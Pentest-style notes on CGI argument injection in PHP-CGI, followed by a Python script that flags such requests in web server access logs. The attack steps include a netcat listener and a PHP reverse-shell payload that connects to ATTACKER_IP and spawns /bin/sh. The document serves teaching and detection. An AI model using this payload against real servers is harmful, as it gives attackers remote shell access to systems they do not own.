CGI Argument Injection

  1. Check whether a phpinfo.php file is available; it reveals the PHP version in use.

  2. In this case, the PHP version is 5.3.4, so the CGI Argument Injection exploit can be used.

  3. Set up a netcat listener:

nc -nlvp 1234

  4. Change the executed command to:

<?php $sock=fsockopen("ATTACKER_IP",1234);exec("/bin/sh -i <&4 >&4 2>&4");?>
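On the detection side, CGI argument injection leaves a recognisable trace in web server logs: a query string with no unencoded `=` is handed to the CGI binary as command-line arguments, so one that decodes to a leading `-` is read as a switch. The following is an added example, not part of the original notes, that flags such requests; it assumes Common Log Format-style access logs, and the function names, regex and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of a Common Log Format line: "METHOD path?query HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_cgi_arg_injection(target: str) -> bool:
    """True when the query string would reach a CGI binary as argv switches."""
    _, sep, query = target.partition("?")
    if not sep or not query:
        return False
    # Per the CGI spec, only a query with no unencoded '=' is split into
    # command-line arguments; an encoded '%3d' does not count as '='.
    if "=" in query:
        return False
    # Decode the way the arguments would be seen: '+' is a separator,
    # %XX is unescaped, leading whitespace is skipped.
    decoded = unquote(query.replace("+", " ")).lstrip()
    return decoded.startswith("-")


def scan(lines):
    """Return (line_number, request_target) for each suspicious log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match and is_cgi_arg_injection(match.group("target")):
            hits.append((number, match.group("target")))
    return hits


# Constructed sample access-log lines (documentation IP range, made-up paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?id=5 HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?-s HTTP/1.1" 200 2048',
    '192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] "POST /index.php?%2dd+example_directive%3d1 HTTP/1.1" 200 90',
    '192.0.2.12 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php?q=-s HTTP/1.1" 200 300',
    '192.0.2.13 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?page HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for number, target in scan(SAMPLE_LOG):
        print(f"line {number}: {target}")
```

The same condition (no unencoded `=`, decoded query starting with `-`) can be used as a reject rule at a reverse proxy or WAF in front of hosts that cannot be upgraded immediately.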